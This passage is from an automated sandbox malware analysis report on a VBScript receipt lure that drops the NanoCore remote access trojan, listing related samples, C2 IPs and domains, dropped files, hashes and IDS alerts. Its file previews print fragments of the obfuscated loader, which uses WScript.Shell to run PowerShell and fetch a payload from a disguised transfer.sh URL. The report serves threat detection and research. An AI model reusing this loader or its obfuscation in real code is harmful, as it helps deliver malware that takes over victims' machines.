                          21:33:34API Interceptor1252x Sleep call for process: aspnet_compiler.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          144.76.136.153Receipt_12203.vbsGet hashmaliciousBrowse
                          • transfer.sh/get/E2oQCW/Server.txt
                          Invoice #60122.vbsGet hashmaliciousBrowse
                          • transfer.sh/get/Vp6k0P/Server.txt
                          M00GS82.vbsGet hashmaliciousBrowse
                          • transfer.sh/get/QipjYs/fOOFFK.txt
                          #P0082.vbsGet hashmaliciousBrowse
                          • transfer.sh/get/4YgL52/HJN.txt
                          Invoice #33190.vbsGet hashmaliciousBrowse
                          • transfer.sh/get/1jDQCmj/trivago.txt
                          ZHDJFEB83MK.vbsGet hashmaliciousBrowse
                          • transfer.sh/15cCRXY/KFKFKF.txt
                          #W002.vbsGet hashmaliciousBrowse
                          • transfer.sh/1YKpmfw/HmS.txt
                          WOO62_InvoiceCopy.vbsGet hashmaliciousBrowse
                          • transfer.sh/p/SHJA.txt
                          A719830-Paid-Receipt.vbsGet hashmaliciousBrowse
                          • transfer.sh/b/deef.txt
                          S0187365-Paid-Receipt.vbsGet hashmaliciousBrowse
                          • transfer.sh/1w231Gc/eeff.txt
                          X92867354_PAYMENT_RECEIPT.vbsGet hashmaliciousBrowse
                          • transfer.sh/1cKLmWw/defff.txt
                          H6289_Payment_Invoice_.vbsGet hashmaliciousBrowse
                          • transfer.sh/bypass.txt
                          W00903InvoicePayment.vbsGet hashmaliciousBrowse
                          • transfer.sh/1Qh4UR2/defender.txt
                          R73981_Payment_Invoice_.vbsGet hashmaliciousBrowse
                          • transfer.sh/1yD4k6Q/ftf.txt
                          S83735478_Payment_Invoice.vbsGet hashmaliciousBrowse
                          • transfer.sh/1WFWzN7/defender.txt
                          D37186235_Payment_Invoice.vbsGet hashmaliciousBrowse
                          • transfer.sh/1RzUlWk/defender.txt
                          In_WO072.vbsGet hashmaliciousBrowse
                          • transfer.sh/1RKyZ9I/hjdds.txt
                          FDOCX3429067800.vbsGet hashmaliciousBrowse
                          • transfer.sh/1AeAeyx/defender.txt
                          W092.vbsGet hashmaliciousBrowse
                          • transfer.sh/1DiufNP/JKS.txt
                          Texas Windstorm Insurance upgrade package.vbsGet hashmaliciousBrowse
                          • transfer.sh/get/1R86ggs/defender.txt

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          newjan.duckdns.org7-Items-receipt.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          9 ITEMS INVOICE RECEIPT.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          15 Items Receipt.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          14 Items receipt.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          16 Items receipt.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          41-Items-invoice.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          8 Items invoice.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          3G1J49A6V_Invoice.vbsGet hashmaliciousBrowse
                          • 185.244.30.23
                          LxYbtlP5nB.exeGet hashmaliciousBrowse
                          • 185.244.30.23
                          Invoice#282730.exeGet hashmaliciousBrowse
                          • 79.134.225.9
                          Urban Receipt.exeGet hashmaliciousBrowse
                          • 79.134.225.9
                          d9hGzIR8mh.exeGet hashmaliciousBrowse
                          • 194.5.97.75
                          6554353_Payment_Invoice.exeGet hashmaliciousBrowse
                          • 194.5.97.75
                          transfer.sh7-Items-receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          9 ITEMS INVOICE RECEIPT.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          15 Items Receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          14 Items receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          16 Items receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          41-Items-invoice.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          12-items-receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          8 Items invoice.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          Receipt_12203.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          Payment_Advoce.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          Payment_Advoce.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          Invoice #60122.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          83736354Invoicereceipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          Invoice52190.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          M00GS82.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          Invoice#52190.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          Payment_Advoce.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          8373543_Invoice_Receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          A6D8N25S_Invoice_receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          Invoice#1096.vbsGet hashmaliciousBrowse
                          • 144.76.136.153

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          HETZNER-ASDE7-Items-receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          TEHYEE.VBSGet hashmaliciousBrowse
                          • 168.119.43.146
                          9 ITEMS INVOICE RECEIPT.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          AQjULTL4bf.exeGet hashmaliciousBrowse
                          • 144.76.112.41
                          zehRYOQKumNzslOoJFhSzJMOABzMtmqTelWJsoDCsqmu.vbsGet hashmaliciousBrowse
                          • 88.99.219.185
                          15 Items Receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          gyuFYFGuig.vbsGet hashmaliciousBrowse
                          • 148.251.87.253
                          14 Items receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          16 Items receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          diagram-129.docGet hashmaliciousBrowse
                          • 136.243.74.161
                          diagram-129.docGet hashmaliciousBrowse
                          • 136.243.74.161
                          i3UmAT06iE.exeGet hashmaliciousBrowse
                          • 195.201.225.248
                          cd.exeGet hashmaliciousBrowse
                          • 168.119.139.96
                          diagram-129.docGet hashmaliciousBrowse
                          • 136.243.74.161
                          GCw589FSm7.exeGet hashmaliciousBrowse
                          • 195.201.225.248
                          jFQ6SEAt26Get hashmaliciousBrowse
                          • 49.13.162.183
                          67d16a17f27f15cf21671ccb406e1e8b647aaf90c72c9.exeGet hashmaliciousBrowse
                          • 195.201.225.248
                          diagram-477.docGet hashmaliciousBrowse
                          • 136.243.74.161
                          diagram-477.docGet hashmaliciousBrowse
                          • 136.243.74.161
                          diagram-477.docGet hashmaliciousBrowse
                          • 136.243.74.161
                          PTPEU7-Items-receipt.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          9 ITEMS INVOICE RECEIPT.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          15 Items Receipt.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          14 Items receipt.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          16 Items receipt.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          SPT DRINGENDE BESTELLUNG _876453,pdf.exeGet hashmaliciousBrowse
                          • 194.147.140.9
                          41-Items-invoice.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          Confirmaci#U00f3n del pedido- No HD10103,pdf.exeGet hashmaliciousBrowse
                          • 194.147.140.9
                          SPT DRINGENDE BESTELLUNG _8764,pdf.exeGet hashmaliciousBrowse
                          • 194.147.140.9
                          8 Items invoice.vbsGet hashmaliciousBrowse
                          • 194.147.140.20
                          heimatec RFQ 4556_ DRINGEND,pdf.exeGet hashmaliciousBrowse
                          • 194.147.140.9
                          Confirmarea comenzii noi-4019,pdf.exeGet hashmaliciousBrowse
                          • 194.147.140.9
                          vuaXoDsazgGet hashmaliciousBrowse
                          • 194.147.142.145
                          dsMBH5SmxLGet hashmaliciousBrowse
                          • 194.147.142.145
                          YIupXk5F7bGet hashmaliciousBrowse
                          • 194.147.142.145
                          pvbuEVYCUBGet hashmaliciousBrowse
                          • 194.147.142.145
                          1jTsJsy5b8Get hashmaliciousBrowse
                          • 194.147.142.145
                          fpAHzxlGRnGet hashmaliciousBrowse
                          • 194.147.142.145
                          sV5aR2SUfW.exeGet hashmaliciousBrowse
                          • 194.147.142.230
                          qSN1mPnL52.exeGet hashmaliciousBrowse
                          • 194.147.142.230

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          54328bd36c14bd82ddaa0c04b25ed9ad7-Items-receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          TEHYEE.VBSGet hashmaliciousBrowse
                          • 144.76.136.153
                          9 ITEMS INVOICE RECEIPT.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          15 Items Receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          14 Items receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          16 Items receipt.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          diagram-129.docGet hashmaliciousBrowse
                          • 144.76.136.153
                          8aGRdeN1Be.exeGet hashmaliciousBrowse
                          • 144.76.136.153
                          QLMRTJS9RA.exeGet hashmaliciousBrowse
                          • 144.76.136.153
                          SecuriteInfo.com.W32.AIDetect.malware2.32348.exeGet hashmaliciousBrowse
                          • 144.76.136.153
                          diagram-477.docGet hashmaliciousBrowse
                          • 144.76.136.153
                          Rombat-0118PDF.exeGet hashmaliciousBrowse
                          • 144.76.136.153
                          CLLKFIJI_(9-13-2021).xlsx.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          YyKMqtQcLMkGx.vbsGet hashmaliciousBrowse
                          • 144.76.136.153
                          Halkbank_Ekstre_20210913_074002_566345 pdf.exeGet hashmaliciousBrowse
                          • 144.76.136.153
                          Kopie dokladu o transakci 09_14_21.exeGet hashmaliciousBrowse
                          • 144.76.136.153
                          qashmhBw9u.exeGet hashmaliciousBrowse
                          • 144.76.136.153
                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                          • 144.76.136.153
                          Quotation.exeGet hashmaliciousBrowse
                          • 144.76.136.153
                          PROJ-9560 - PACKING SLIP.exeGet hashmaliciousBrowse
                          • 144.76.136.153

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\Public\Run\New.vbs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):3100
                          Entropy (8bit):3.6686082642445146
                          Encrypted:false
                          SSDEEP:96:q4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyyD:q4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyB
                          MD5:2D5BFA2C88B29898AC2563FF30B91EBC
                          SHA1:44464A0CCD9BCC414F2F700AF0E3A41C169FA3BB
                          SHA-256:130112D5EB85F0EE5AA7CFD244196E7386821DE7046EA7BB412E70F244C1B20A
                          SHA-512:7BF2AFC68E4386CE46ECAD80DCC096417EB66D523514F3F63CF6E903036EE3B7A4350F5CB32F68670F014B80E8E765A2C782B8FCE784E82A6A3599D235CDCE8B
                          Malicious:false
                          Yara Hits:
                          • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\Public\Run\New.vbs, Author: Florian Roth
                          Reputation:low
                          Preview: Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/K5k7xj/HSJDUIFH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%
                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):57895
                          Entropy (8bit):5.07724879463521
                          Encrypted:false
                          SSDEEP:1536:vvI+z30kaAxV3CNBQkj25h4iUxvaV7flJnVv6H15qdpnUSlQOdBQNUzktAHkbNK3:nI+z30NAxV3CNBQkj25qiUvaV7flJnV/
                          MD5:ABF0CA1055207E755309961A7F660E0D
                          SHA1:F886C56CCD77C17EBE81C8BFBFFCC42CBC614458
                          SHA-256:F2161823E2B5F73BBD5C674EA1E610A412370E87E23377B9DB1E6451F5417139
                          SHA-512:3535DB5640324B1E39616B23F30BE723F16446E5747A5FEC69F8090C0EDEE489E129BA9C6CC1EB5E290620570DFABC73F1CF116042B006BD692F7671A078D4CC
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview: PSMODULECACHE.X..........I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm
                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):0.9260988789684415
                          Encrypted:false
                          SSDEEP:3:Nlllulb/lj:NllUb/l
                          MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                          SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                          SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                          SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                          Malicious:false
                          Preview: @...e................................................@..........
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcuytkig.yj1.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruruistl.ndu.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2088
                          Entropy (8bit):7.089541637477408
                          Encrypted:false
                          SSDEEP:48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhDjhL
                          MD5:84864902DEC5038CEF326FF21E8D5F98
                          SHA1:2F10FEC81D95813C3B2530EC4CECED70164A08C5
                          SHA-256:5B4853A46F99AC6445B68DC1A841D511D0E86C6EDEC2A0A84F3778039A578B6B
                          SHA-512:A77BCDB522CE208C8D785F44D9FE90C6D1314CB199A4BE72E220F4B8C5446265EEEF1C51EFFD2D7BDCCDC8F4A76F803A41A4973364757950D0777E8BAEF0B14C
                          Malicious:false
                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):8
                          Entropy (8bit):3.0
                          Encrypted:false
                          SSDEEP:3:Kk+tn:Kk+t
                          MD5:5FCEB427E866F3F32C7F4098F98780D9
                          SHA1:081B52B4E4E0DA9EEAAB55F5EED88A93E6AEA412
                          SHA-256:9797E1DD7C8FBC1BFB9BAD3DB3552FC30EC1CB848644E0C65BDD65DA5BB009F9
                          SHA-512:DA2D8F6250B8B8E2A35E7D53A1C3C8AC3C8696D66B27F12F548CCF7C6E41D8D052CEF1AF2497824306CBAB329C8406C638E045225E851452EC72893FDF31F786
                          Malicious:true
                          Preview: y.P..x.H
                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):24
                          Entropy (8bit):4.501629167387823
                          Encrypted:false
                          SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                          MD5:ACD3FB4310417DC77FE06F15B0E353E6
                          SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                          SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                          SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                          Malicious:false
                          Preview: 9iH...}Z.4..f..J".C;"a
                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):5.320159765557392
                          Encrypted:false
                          SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                          MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                          SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                          SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                          SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                          Malicious:false
                          Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):327768
                          Entropy (8bit):7.999367066417797
                          Encrypted:true
                          SSDEEP:6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
                          MD5:2E52F446105FBF828E63CF808B721F9C
                          SHA1:5330E54F238F46DC04C1AC62B051DB4FCD7416FB
                          SHA-256:2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
                          SHA-512:C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
                          Malicious:false
                          Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                          C:\Users\user\Documents\20210914\PowerShell_transcript.549163.hi07K+vO.20210914213201.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):12051
                          Entropy (8bit):4.439767961294273
                          Encrypted:false
                          SSDEEP:192:J4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWi8yyyyyyyyyyyAnmyyyyyyyyyyyiml:KX+amXlX+amXJX+amXVvyGLGLwJ
                          MD5:59B2B3D613316E0CE2148EC8116ACF15
                          SHA1:9C0A2D0F1D0EE495F8994786AEBDC360B68DF6A3
                          SHA-256:00825181B27D586652B6388F2572F15E25457185FF9A4E32227B1E1ACD4C963A
                          SHA-512:A123151D1A281BF68E69DD79FD5D42415CF79539573B07F1589103C5C7ECDFC8B5CC57D05A8B87B4F15327CAE33B8AA91205E8ADBA2EF743E55365E02CD843B0
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210914213201..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 549163 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X

                          Static File Info

                          General

                          File type:ASCII text, with very long lines, with CRLF line terminators
                          Entropy (8bit):3.664427022591082
                          TrID:
                            File name:18-ITEMS-RECEIPT.vbs
                            File size:3097
                            MD5:3d701c54bba78c8cbfc22218dd2726d0
                            SHA1:3e9f34b5b59b54460ab4de151f9b17c93396a593
                            SHA256:70feaa2efd6ba7ff05fb8d12415f736ffb3d46e35ef797ec6add87434c7c62fa
                            SHA512:c78de845275b5b3cb884d4ffa278295378ed82470d8c9c79f1df05a5834fd5a5f665568e3e6ddc12eecd3bdbacad615f12fb14637816107772b0df60d7fbab95
                            SSDEEP:96:Y4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyyK:Y4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyM
                            File Content Preview:Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0

                            File Icon

                            Icon Hash:e8d69ece869a9ec4

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            09/14/21-21:33:39.205551UDP254DNS SPOOF query response with TTL of 1 min. and no authority53583618.8.8.8192.168.2.3
                            09/14/21-21:33:40.260504TCP2025019ET TROJAN Possible NanoCore C2 60B497796700192.168.2.3194.147.140.20
                            09/14/21-21:33:48.215359UDP254DNS SPOOF query response with TTL of 1 min. and no authority53601008.8.8.8192.168.2.3
                            09/14/21-21:33:48.616836TCP2025019ET TROJAN Possible NanoCore C2 60B497846700192.168.2.3194.147.140.20
                            09/14/21-21:33:55.641357UDP254DNS SPOOF query response with TTL of 1 min. and no authority53531958.8.8.8192.168.2.3
                            09/14/21-21:33:56.070345TCP2025019ET TROJAN Possible NanoCore C2 60B497856700192.168.2.3194.147.140.20
                            09/14/21-21:34:02.365993TCP2025019ET TROJAN Possible NanoCore C2 60B497866700192.168.2.3194.147.140.20
                            09/14/21-21:34:08.801038TCP2025019ET TROJAN Possible NanoCore C2 60B497876700192.168.2.3194.147.140.20
